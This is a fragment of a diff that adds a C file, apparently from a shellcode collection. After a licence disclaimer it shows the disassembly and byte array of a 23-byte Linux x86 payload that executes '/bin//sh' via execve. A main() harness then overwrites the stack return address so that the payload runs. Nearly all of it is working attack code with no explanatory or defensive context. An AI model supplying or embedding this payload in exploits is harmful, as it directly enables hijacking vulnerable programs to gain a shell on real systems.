+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ * 80483c3: 6a 0b push $0xb
+ * 80483c5: 58 pop %eax
+ * 80483c6: 99 cltd
+ * 80483c7: 52 push %edx
+ * 80483c8: 68 6e 2f 73 68 push $0x68732f6e
+ * 80483cd: 68 2f 2f 62 69 push $0x69622f2f
+ * 80483d2: 89 e3 mov %esp,%ebx
+ * 80483d4: 52 push %edx
+ * 80483d5: 53 push %ebx
+ * 80483d6: 89 e1 mov %esp,%ecx
+ * 80483d8: cd 80 int $0x80
+ *
+ */
+
+char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68"
+ "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
+ "\xe1\xcd\x80";
+
+main() {
+ long *ret;
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+}
+

